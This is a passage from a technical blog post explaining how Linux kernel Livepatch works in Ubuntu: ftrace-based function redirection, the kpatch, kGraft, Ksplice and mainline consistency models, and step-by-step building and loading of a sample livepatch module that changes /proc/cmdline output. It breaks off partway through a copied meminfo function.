<p>Matthew Ruffell</p>Matthew RuffellRecently I worked a particularly interesting case where an OpenStack compute node had all of its virtual machines pause at the same time, which I attributed to a reference counter overflowing in the kernel’s zero_page. Today, we are going to take a in-depth look at the problem at hand, and see how I debugged and fixed the issue, from beginning to completion. Let’s get started.Everything You Wanted to Know About Kernel Livepatch in Ubuntu2020-04-20T00:00:00+00:002020-04-20T00:00:00+00:00https://ruffell.nz/programming/writeups/2020/04/20/everything-you-wanted-to-know-about-kernel-livepatch-in-ubuntu<p>One of the more recent killer features implemented by most major Linux distros
these days is the ability to patch the kernel while it is running, without the
need for a reboot.</p>
<p>While this may sound like sorcery for some, this is a very real feature, called
Livepatch. Livepatch uses ftrace in new and interesting ways, by patching in
calls at the beginning of existing functions to new patched functions, delivered
as kernel modules.</p>
<p>This lets you update and fix bugs on the fly, although its use is typically
reserved for security critical fixes only.</p>
<p><img src="/assets/images/2020_018.png" alt="hero" /></p>
<p>The whole concept is extremely interesting, so today we will look into what
Livepatch is, how it is implemented across several distros, we will write some
Livepatches of our own, and look at how Livepatch works in Ubuntu for end users.</p>
<!--more-->
<h1 id="why-do-we-need-livepatch">Why Do We Need Livepatch?</h1>
<p>Working in Sustaining Engineering at Canonical, it is pretty common to see
bug reports from machines which have very high uptimes, such as six to twelve
months, or sometimes even longer.</p>
<p>These machines normally run important workloads which can’t be interrupted for
a reboot, since they might be a part of critical public infrastructure, or a
busy build system. The Ubuntu Kernel Team typically releases a new updated
kernel for each distribution release on a <a href="https://kernel.ubuntu.com/">3 week SRU cycle</a>
with additional updates always within a day of two of a new CVE being released.</p>
<p>Machines with important workloads aren’t going to want to reboot every
six months, let alone every three weeks for each new kernel release. Keeping
these machines safe and up to date with security fixes is a must, and this
is the motivation behind Livepatch.</p>
<h1 id="what-is-livepatch">What is Livepatch?</h1>
<p>Livepatch is the ability for the kernel to change the flow of code execution
from a broken or vulnerable function, to a new, fixed function during runtime.</p>
<p>In most cases, the new function is the exact same as the function it is replacing,
but with minor changes, such as adding a check for null, or changing the order
of some locks or adding a quick logic fix.</p>
<p>The code redirection is achieved with <a href="https://www.kernel.org/doc/Documentation/trace/ftrace.txt">ftrace</a>.
ftrace is a tool which lets you trace kernel function calls, but it can also
add and remove instructions from functions as well. A good example is kprobes,
which can patch in blocks of code to existing functions, usually used to print
debug values. kprobes are mostly ftrace based these days, which is important,
since we don’t want kprobes and Livepatch to clash and patch the same function
at the same time, so ftrace controls function consistency.</p>
<p>Livepatch is implemented by compiling the new fixed function into a kernel module
and loading it into the system. ftrace is then used to redirect calls from the
old function to the new function in the kernel module. This process actually has
to be done very carefully, and we will discuss it in the next section, when we
cover different consistency models.</p>
<p>For the actual implementation, it is remarkably simple.</p>
<p>Have you ever disassembled a kernel function before and wondered why every
kernel function begins with a full sized padded <code class="language-plaintext highlighter-rouge">nop</code> instruction?</p>
<p>For example, let’s look at <code class="language-plaintext highlighter-rouge">sysrq_handle_crash()</code>, as seen in my previous
article <a href="/programming/writeups/2019/02/22/beginning-kernel-crash-debugging-on-ubuntu-18-10.html">Beginning Kernel Crash Debugging on Ubuntu 18.10</a>.</p>
<p><img src="/assets/images/2019_119.png" alt="nop instruction" /></p>
<p>Well, what ftrace does is patch out the <code class="language-plaintext highlighter-rouge">nop</code> with a <code class="language-plaintext highlighter-rouge">call</code> which points towards
the new function. If you look carefully, the <code class="language-plaintext highlighter-rouge">nop</code> is located before the function
starts manipulating the stack, which means everything is consistent, and very
elegant.</p>
<p><img src="/assets/images/2020_014.svg" alt="livepatch" /></p>
<p><a href="https://en.wikipedia.org/wiki/File:Linux_kernel_live_patching_kpatch.svg">Credit and license for image</a></p>
<p>The above image demonstrates this behaviour very well. Now, this technique works
great at a function level, where logic changes but data does not.</p>
<p>Limitations quickly arise within Livepatch when data changes are required. If a
new member is needed to be added or removed from a struct implemented within the
function or the file, these changes cannot be passed onto the Livepatched version,
since you cannot modify data structures during runtime, as they may be in use
by different tasks on different cpus. The same goes for changing the function
signature, since the calling function would have to rearrange variables pushed on
the stack. Livepatch is also limited to modifying functions which are traceable
by ftrace, and not all kernel functions can be traced.</p>
<p>Because of these limitations, and the complexity that arises from consistency
models which we will discuss about next, Livepatch is more of a temporary band-aid
solution, reserved for fixing critical security issues until such a time comes
when the host can be rebooted into a updated kernel.</p>
<h1 id="consistency-models-and-varying-implementations">Consistency Models and Varying Implementations</h1>
<p>As mentioned in the previous section, the real complexity behind Livepatch is
the decision making process required when ftrace actually performs the switch
from the old function to the new function.</p>
<p>Say the changes to the new function are basic. Adding a null pointer check sort
of basic. The semantics of the function itself haven’t changed, and there is
no existing state to manage. All we have to do then is check to see if any
tasks are running which are using the old function. This can be done by examining
the stack of sleeping tasks. If the function is not found in any of them, we can
easily patch the change in.</p>
<p>But what happens if a task is using the old function? Do we make a rule and say
all tasks must be stopped, we patch, and then start them all again? Or do we
add complexity by adding a list of tasks that use the old function, and tasks
that use the new function, and maintain a trampoline which decides between each
function for a given task?</p>
<p>What happens if the Livepatch changes the order that locks are acquired and
released? The affected tasks which hold those locks need to be patched when the
locks are no longer held, and the entire system needs to switch over to the
new function at the same time. How do we co-ordinate this?</p>
<p>This is where consistency models come in, and is the driving force behind the
different implementations of Livepatch. Each distribution has its own opinion on
how things should be done, and we will look at all of them.</p>
<h2 id="kpatch">kpatch</h2>
<p><a href="https://en.wikipedia.org/wiki/Kpatch">kpatch</a> is developed by Red Hat, and
uses the simplest consistency model. kpatch operates pretty much as previously
explained, by using ftrace to change the <code class="language-plaintext highlighter-rouge">nop</code> instruction in the old function
to a <code class="language-plaintext highlighter-rouge">call</code> instruction, pointing to the new function.</p>
<p><img src="/assets/images/2020_014.svg" alt="livepatch" /></p>
<p>kpatch keeps the system consistent by first stopping all running tasks. The
stack traces of each task is then examined. If the old function is not found in
any of the tasks stack traces, then ftrace applies the patch, and all future
calls to the patched function will use the new function.</p>
<p>This approach is atomic and safe, since there is only one view of the function
at a time, it is either old, or new. There are no consistency issues that arise
if the new function changes data structures differently to the old function, and
the structure is passed to tasks which haven’t been migrated to the new
function.</p>
<p>The limitations of kpatch involve not being able to modify data structures, and
if a process is still using the patched function, patching fails, and all tasks
are restarted again, to attempt the patch at a later time. There is some overhead
in stopping and starting all tasks, which results in a small loss of service as
those tasks are stopped.</p>
<h2 id="kgraft">kGraft</h2>
<p><a href="https://en.wikipedia.org/wiki/KGraft">kGraft</a> is developed by SUSE, and is by
far the most complex consistency model. kGraft employs a per task consistency
model, where all tasks remain running on the system, and tasks are patched one
by one. This gives no downtime at all, since all tasks keep running during
Livepatch, and patching can never “fail” in entirety.</p>
<p>kGraft achieves this by maintaining consistent “world views” to userspace
processes, kernel threads and interrupt handlers, during their execution in
kernel space.</p>
<p>For example, let’s say we have a userspace process making a syscall, and a
Livepatch request came in midway through this syscall.</p>
<p><img src="/assets/images/2020_015.svg" alt="syscall" /></p>
<p>If the syscall involved calling the function which will be patched multiple
times, on subsequent calling of the patched function, the semantics might have
changed since the first time it was executed. If locking orders have changed,
we might be facing a deadlock, which will end in certain failure.</p>
<p><img src="/assets/images/2020_016.svg" alt="syscall" /></p>
<p>Instead, what kGraft does is insert a trampoline which is the target of the
<code class="language-plaintext highlighter-rouge">call</code> instruction which is replacing the <code class="language-plaintext highlighter-rouge">nop</code>. The trampoline points to both
the old function and the new function. If the task has not yet been migrated
to use the new function, the trampoline jumps to the old function and execution
continues. If the task has been migrated, then the new function is called.</p>
<p>This means that any userspace process in a syscall, or kernel task, or interrupt
handler still in kernel space will always use the old function.</p>
<p><img src="/assets/images/2020_017.svg" alt="syscall" /></p>
<p>This continues until each user space process finishes it syscall, or kernel task
completes, or interrupt handler completes. At this stage, that task is then
migrated over to the new function. When all tasks have been migrated, the
trampoline is removed, and the <code class="language-plaintext highlighter-rouge">call</code> instruction is updated to point directly
to the new function.</p>
<p>The benefits of kGraft is that all tasks are kept running during Livepatch.
Downsides include keeping two different implementations of the same function
around at the same time. This can cause problems when long running processes,
like those waiting on disk or network I/O get stuck in kernel space, and won’t
be patched until they complete. This can lead to inconsistencies if the new
function changes internal data structures differently to the original, since
both functions can still be executed in parallel.</p>
<h2 id="ksplice">Ksplice</h2>
<p><a href="https://en.wikipedia.org/wiki/Ksplice">Ksplice</a> is developed by Oracle, and
has a consistency model similar to kpatch. Ksplice stops all tasks before
patching the functions atomically.</p>
<p>The differentiating feature to Ksplice, is the ability to patch functions which
require changes to data structures. This process is not automatic though, as
a programmer must implement extra code to the Livepatch module which handles
the transition from the old data structure to the new.</p>
<h2 id="livepatch-mainline-linux">Livepatch (Mainline Linux)</h2>
<p>Livepatch was mainlined into the Linux kernel during the 4.0 development cycle.</p>
<p>The <a href="https://www.kernel.org/doc/Documentation/livepatch/livepatch.txt">Livepatch implementation</a>
is a hybrid between the kpatch and kGraft implementations, taking the best ideas
from both. Livepatch uses kGraft’s per task consistency and syscall exit
migration, alongside kpatch’s stack trace based switching.</p>
<p>Patches are applied on a per task basis, one task at a time. There is no
downtime as tasks do not need to be stopped. This also means that the trampoline
based solution is used.</p>
<p>The consistency model for mainline operates in a set of steps:</p>
<ol>
<li>Firstly, the stack trace of sleeping tasks is checked. If the function to be
patched is not found in the stack trace, the task is patched to use the new
function. If this fails for a particular task, it will re-examine the stack trace
periodically and attempt to patch at a later time. Most, if not all tasks will be
patched in this step.</li>
<li>The second step is to patch the task once it completes and exits from kernel
space, such as a syscall finishing or a interrupt handler completing. This is
useful for long running I/O or cpubound tasks. In some cases, SIGSTOP must be
issued to I/O bound tasks to force it to exit the kernel, be patched, and then
send SIGCONT so it can continue.</li>
<li>For the kernel “swapper” task, which is executed whenever the CPU is idle and
never exits the kernel, it has a special <code class="language-plaintext highlighter-rouge">klp_update_patch_state()</code> call in the
idle loop which patches the task before the CPU enters the idle state.</li>
</ol>
<h2 id="what-consistency-model-does-ubuntu-use">What Consistency Model Does Ubuntu Use?</h2>
<p>Ubuntu uses the Livepatch (mainline) consistency model, which has the best of
both kpatch and kGraft. All code is the same as what is shipped in the mainline
kernel, and there are no custom changes.</p>
<h1 id="writing-our-own-livepatches">Writing our Own Livepatches</h1>
<p>Now that we have learned a bit about what Livepatch is, how it works, and the
careful consideration that goes into selecting a consistency model, let’s
start making some Livepatches of our own.</p>
<h2 id="structure-of-a-livepatch">Structure of a Livepatch</h2>
<p>For our first Livepatch, I think we will follow the sample which is provided in
the mainline kernel. Download a copy of <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/samples/livepatch/livepatch-sample.c">livepatch-sample.c</a>
and have a read.</p>
<p>Note, the Livepatch API has changed over time, so if you want to build for 4.4
Xenial, use the <code class="language-plaintext highlighter-rouge">livepatch-sample.c</code> from the Xenial kernel sources. If you
get an error <code class="language-plaintext highlighter-rouge">insmod: ERROR: could not insert module livepatch-sample.ko: Invalid parameters</code>
then you are using the wrong Livepatch API.</p>
<p>I am going to explain the latest API, as found in 5.4 Focal.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/livepatch.h>
</span>
<span class="cp">#include <linux/seq_file.h>
</span><span class="k">static</span> <span class="kt">int</span> <span class="nf">livepatch_cmdline_proc_show</span><span class="p">(</span><span class="k">struct</span> <span class="n">seq_file</span> <span class="o">*</span><span class="n">m</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">v</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">seq_printf</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="s">"this has been live patched"</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">static</span> <span class="k">struct</span> <span class="n">klp_func</span> <span class="n">funcs</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">{</span>
<span class="p">.</span><span class="n">old_name</span> <span class="o">=</span> <span class="s">"cmdline_proc_show"</span><span class="p">,</span>
<span class="p">.</span><span class="n">new_func</span> <span class="o">=</span> <span class="n">livepatch_cmdline_proc_show</span><span class="p">,</span>
<span class="p">},</span> <span class="p">{</span> <span class="p">}</span>
<span class="p">};</span>
<span class="k">static</span> <span class="k">struct</span> <span class="n">klp_object</span> <span class="n">objs</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">{</span>
<span class="cm">/* name being NULL means vmlinux */</span>
<span class="p">.</span><span class="n">funcs</span> <span class="o">=</span> <span class="n">funcs</span><span class="p">,</span>
<span class="p">},</span> <span class="p">{</span> <span class="p">}</span>
<span class="p">};</span>
<span class="k">static</span> <span class="k">struct</span> <span class="n">klp_patch</span> <span class="n">patch</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">.</span><span class="n">mod</span> <span class="o">=</span> <span class="n">THIS_MODULE</span><span class="p">,</span>
<span class="p">.</span><span class="n">objs</span> <span class="o">=</span> <span class="n">objs</span><span class="p">,</span>
<span class="p">};</span>
<span class="k">static</span> <span class="kt">int</span> <span class="nf">livepatch_init</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">klp_enable_patch</span><span class="p">(</span><span class="o">&</span><span class="n">patch</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">livepatch_exit</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">}</span>
<span class="n">module_init</span><span class="p">(</span><span class="n">livepatch_init</span><span class="p">);</span>
<span class="n">module_exit</span><span class="p">(</span><span class="n">livepatch_exit</span><span class="p">);</span>
<span class="n">MODULE_LICENSE</span><span class="p">(</span><span class="s">"GPL"</span><span class="p">);</span>
<span class="n">MODULE_INFO</span><span class="p">(</span><span class="n">livepatch</span><span class="p">,</span> <span class="s">"Y"</span><span class="p">);</span>
</code></pre></div></div>
<p>As you can already see, since the Livepatch is a kernel module, it follows the
same process required when writing a kernel module. We <code class="language-plaintext highlighter-rouge">#include</code> the kernel
module header files of <code class="language-plaintext highlighter-rouge">linux/module.h</code> and <code class="language-plaintext highlighter-rouge">linux/kernel.h</code>, and declare our
<code class="language-plaintext highlighter-rouge">module_init()</code> and <code class="language-plaintext highlighter-rouge">module_exit()</code> function pointers.</p>
<p>To say we are making a Livepatch, we also include <code class="language-plaintext highlighter-rouge">linux/livepatch.h</code>, set
the module info marco to <code class="language-plaintext highlighter-rouge">livepatch, Y</code> and have the module init function call
<code class="language-plaintext highlighter-rouge">klp_enable_patch()</code>, the entry point to the Livepatch subsystem.</p>
<p>Declaring the Livepatch itself is pretty simple. In this example, we will
patch <code class="language-plaintext highlighter-rouge">cmdline_proc_show()</code>, the function which retruns the kernel commandline
when you read from <code class="language-plaintext highlighter-rouge">/proc/cmdline</code>.</p>
<p>We define a new function, <code class="language-plaintext highlighter-rouge">livepatch_cmdline_proc_show()</code>, and give the “fixed”
implementation. We then map the new function to the old function by defining
a struct of type <code class="language-plaintext highlighter-rouge">klp_func</code>, in this case called <code class="language-plaintext highlighter-rouge">funcs[]</code>, and filling in the
members <code class="language-plaintext highlighter-rouge">.old_name</code> and <code class="language-plaintext highlighter-rouge">.new_func</code>.</p>
<p>Since we might need to replace more than one function in our Livepatch, we can
create many of these function mappings, since <code class="language-plaintext highlighter-rouge">funcs[]</code> is an array.</p>
<p>We then tell Livepatch what to patch with struct <code class="language-plaintext highlighter-rouge">klp_object</code>. We set <code class="language-plaintext highlighter-rouge">.funcs</code>
to our array of functions, and set <code class="language-plaintext highlighter-rouge">.name</code> to be another Livepatch module this
has a dependency on, or simply <code class="language-plaintext highlighter-rouge">NULL</code> if we want to target <code class="language-plaintext highlighter-rouge">vmlinux</code>.</p>
<p>Finally, this is wrapped into a struct <code class="language-plaintext highlighter-rouge">klp_patch</code>, where we declare the module
name, and the object struct. This is the struct we pass a reference to when
<code class="language-plaintext highlighter-rouge">klp_enable_patch()</code> is called.</p>
<p>We can build the module with the following <code class="language-plaintext highlighter-rouge">Makefile</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>obj-m := livepatch-sample.o
KDIR := /lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)
default:
$(MAKE) -C $(KDIR) M=$(PWD) modules
clean:
$(MAKE) -C $(KDIR) M=$(PWD) clean
</code></pre></div></div>
<p>You need to install a compiler, and the kernel header for your running kernel:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">sudo </span>apt <span class="nb">install </span>linux-headers-<span class="sb">`</span><span class="nb">uname</span> <span class="nt">-r</span><span class="sb">`</span>
<span class="nv">$ </span><span class="nb">sudo </span>apt <span class="nb">install </span>build-essential
</code></pre></div></div>
<p>Then go ahead and run <code class="language-plaintext highlighter-rouge">make</code>:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>make
make <span class="nt">-C</span> /lib/modules/5.4.0-21-generic/build <span class="nv">M</span><span class="o">=</span>/home/ubuntu/simple modules
make[1]: Entering directory <span class="s1">'/usr/src/linux-headers-5.4.0-21-generic'</span>
CC <span class="o">[</span>M] /home/ubuntu/simple/livepatch-sample.o
Building modules, stage 2.
MODPOST 1 modules
CC <span class="o">[</span>M] /home/ubuntu/simple/livepatch-sample.mod.o
LD <span class="o">[</span>M] /home/ubuntu/simple/livepatch-sample.ko
make[1]: Leaving directory <span class="s1">'/usr/src/linux-headers-5.4.0-21-generic'</span>
</code></pre></div></div>
<p>I did this on Focal, but this should work on any Ubuntu kernel from 4.4 Xenial
and upward, as they all have Livepatch enabled.</p>
<p>We then have the end result, <code class="language-plaintext highlighter-rouge">livepatch-sample.ko</code>. Lets do a before and after
read of <code class="language-plaintext highlighter-rouge">/proc/cmdline</code> as we load the module:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cat</span> /proc/cmdline
<span class="nv">BOOT_IMAGE</span><span class="o">=</span>/boot/vmlinuz-5.4.0-21-generic <span class="nv">root</span><span class="o">=</span><span class="nv">UUID</span><span class="o">=</span>f9f909c3-782a-43c2-a59d-c789656b4188 ro
<span class="nv">$ </span><span class="nb">sudo </span>insmod livepatch-sample.ko
<span class="nv">$ </span><span class="nb">cat</span> /proc/cmdline
this has been live patched
</code></pre></div></div>
<p>How cool is that? We have successfully Livepatched our system. Checking <code class="language-plaintext highlighter-rouge">dmesg</code> shows
us the progress of Livepatch:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[ 33.100762] livepatch_sample: loading out-of-tree module taints kernel.
[ 33.100764] livepatch_sample: tainting kernel with TAINT_LIVEPATCH
[ 33.100793] livepatch_sample: module verification failed: signature and/or required key missing - tainting kernel
[ 33.111720] livepatch: enabling patch 'livepatch_sample'
[ 33.114679] livepatch: 'livepatch_sample': starting patching transition
[ 33.883586] livepatch: 'livepatch_sample': patching complete
</code></pre></div></div>
<p>Note, we didn’t sign our kernel module, which is why module verification failed.
This is only really important if you are using secureboot. Otherwise, our kernel
gained taint flags for loading the Livepatch module.</p>
<h2 id="making-a-slightly-more-complex-livepatch">Making a Slightly More Complex Livepatch</h2>
<p>The previous Livepatch example used a completely new basic function to write
back a replaced kernel command line. What happens if we want to actually patch
existing code?</p>
<p>The next example will follow along the case for using kpatch-build, using the
primary example in the <a href="https://github.com/dynup/kpatch">kpatch repository</a>.</p>
<p>What we want to do is change how the text is displayed for <code class="language-plaintext highlighter-rouge">VmallocChunk</code> in
<code class="language-plaintext highlighter-rouge">/proc/meminfo</code>. The following patch for Linux 5.4 makes it capitalised:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>diff --git a/fs/proc/meminfo.c b/fs/proc/meminfo.c
index 8c1f1bb1a5ce..3053c1bce50d 100644
--- a/fs/proc/meminfo.c
+++ b/fs/proc/meminfo.c
@@ -117,7 +117,7 @@ static int meminfo_proc_show(struct seq_file *m, void *v)
seq_printf(m, "VmallocTotal: %8lu kB\n",
(unsigned long)VMALLOC_TOTAL >> 10);
show_val_kb(m, "VmallocUsed: ", vmalloc_nr_pages());
- show_val_kb(m, "VmallocChunk: ", 0ul);
+ show_val_kb(m, "VMALLOCCHUNK: ", 0ul);
show_val_kb(m, "Percpu: ", pcpu_nr_pages());
#ifdef CONFIG_MEMORY_FAILURE
</code></pre></div></div>
<h3 id="writing-the-livepatch-ourselves">Writing the Livepatch Ourselves</h3>
<p>Okay, let’s follow a similar format to last time. Let’s copy the new function
into our Livepatch template, like so:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/livepatch.h>
</span>
<span class="k">static</span> <span class="kt">int</span> <span class="nf">livepatch_meminfo_proc_show</span><span class="p">(</span><span class="k">struct</span> <span class="n">seq_file</span> <span class="o">*</span><span class="n">m</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">v</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">struct</span> <span class="n">sysinfo</span> <span class="n">i</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">committed</span><span class="p">;</span>
<span class="kt">long</span> <span class="n">cached</span><span class="p">;</span>
<span class="kt">long</span> <span class="n">available</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">pages</span><span class="p">[</span><span class="n">NR_LRU_LISTS</span><span class="p">];</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">sreclaimable</span><span class="p">,</span> <span class="n">sunreclaim</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">lru</span><span class="p">;</span>
<span class="n">si_meminfo</span><span class="p">(</span><span class="o">&</span><span class="n">i</span><span class="p">);</span>
<span class="n">si_swapinfo</span><span class="p">(</span><span class="o">&</span><span class="n">i</span><span class="p">);</span>
<span class="n">committed</span> <span class="o">=</span> <span class="n">percpu_counter_read_positive</span><span class="p">(</span><span class="o">&</span><span class="n">vm_committed_as</span><span class="p">);</span>
<span class="n">cached</span> <span class="o">=</span> <span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_FILE_PAGES</span><span class="p">)</span> <span class="o">-</span>
<span class="n">total_swapcache_pages</span><span class="p">()</span> <span class="o">-</span> <span class="n">i</span><span class="p">.</span><span class="n">bufferram</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">cached</span> <span class="o"><</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">cached</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="n">lru</span> <span class="o">=</span> <span class="n">LRU_BASE</span><span class="p">;</span> <span class="n">lru</span> <span class="o"><</span> <span class="n">NR_LRU_LISTS</span><span class="p">;</span> <span class="n">lru</span><span class="o">++</span><span class="p">)</span>
<span class="n">pages</span><span class="p">[</span><span class="n">lru</span><span class="p">]</span> <span class="o">=</span> <span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_LRU_BASE</span> <span class="o">+</span> <span class="n">lru</span><span class="p">);</span>
<span class="n">available</span> <span class="o">=</span> <span class="n">si_mem_available</span><span class="p">();</span>
<span class="n">sreclaimable</span> <span class="o">=</span> <span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_SLAB_RECLAIMABLE</span><span class="p">);</span>
<span class="n">sunreclaim</span> <span class="o">=</span> <span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_SLAB_UNRECLAIMABLE</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"MemTotal: "</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">totalram</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"MemFree: "</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">freeram</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"MemAvailable: "</span><span class="p">,</span> <span class="n">available</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Buffers: "</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">bufferram</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Cached: "</span><span class="p">,</span> <span class="n">cached</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"SwapCached: "</span><span class="p">,</span> <span class="n">total_swapcache_pages</span><span class="p">());</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Active: "</span><span class="p">,</span> <span class="n">pages</span><span class="p">[</span><span class="n">LRU_ACTIVE_ANON</span><span class="p">]</span> <span class="o">+</span>
<span class="n">pages</span><span class="p">[</span><span class="n">LRU_ACTIVE_FILE</span><span class="p">]);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Inactive: "</span><span class="p">,</span> <span class="n">pages</span><span class="p">[</span><span class="n">LRU_INACTIVE_ANON</span><span class="p">]</span> <span class="o">+</span>
<span class="n">pages</span><span class="p">[</span><span class="n">LRU_INACTIVE_FILE</span><span class="p">]);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Active(anon): "</span><span class="p">,</span> <span class="n">pages</span><span class="p">[</span><span class="n">LRU_ACTIVE_ANON</span><span class="p">]);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Inactive(anon): "</span><span class="p">,</span> <span class="n">pages</span><span class="p">[</span><span class="n">LRU_INACTIVE_ANON</span><span class="p">]);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Active(file): "</span><span class="p">,</span> <span class="n">pages</span><span class="p">[</span><span class="n">LRU_ACTIVE_FILE</span><span class="p">]);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Inactive(file): "</span><span class="p">,</span> <span class="n">pages</span><span class="p">[</span><span class="n">LRU_INACTIVE_FILE</span><span class="p">]);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Unevictable: "</span><span class="p">,</span> <span class="n">pages</span><span class="p">[</span><span class="n">LRU_UNEVICTABLE</span><span class="p">]);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Mlocked: "</span><span class="p">,</span> <span class="n">global_zone_page_state</span><span class="p">(</span><span class="n">NR_MLOCK</span><span class="p">));</span>
<span class="cp">#ifdef CONFIG_HIGHMEM
</span> <span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"HighTotal: "</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">totalhigh</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"HighFree: "</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">freehigh</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"LowTotal: "</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">totalram</span> <span class="o">-</span> <span class="n">i</span><span class="p">.</span><span class="n">totalhigh</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"LowFree: "</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">freeram</span> <span class="o">-</span> <span class="n">i</span><span class="p">.</span><span class="n">freehigh</span><span class="p">);</span>
<span class="cp">#endif
</span>
<span class="cp">#ifndef CONFIG_MMU
</span> <span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"MmapCopy: "</span><span class="p">,</span>
<span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)</span><span class="n">atomic_long_read</span><span class="p">(</span><span class="o">&</span><span class="n">mmap_pages_allocated</span><span class="p">));</span>
<span class="cp">#endif
</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"SwapTotal: "</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">totalswap</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"SwapFree: "</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">freeswap</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Dirty: "</span><span class="p">,</span>
<span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_FILE_DIRTY</span><span class="p">));</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Writeback: "</span><span class="p">,</span>
<span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_WRITEBACK</span><span class="p">));</span>
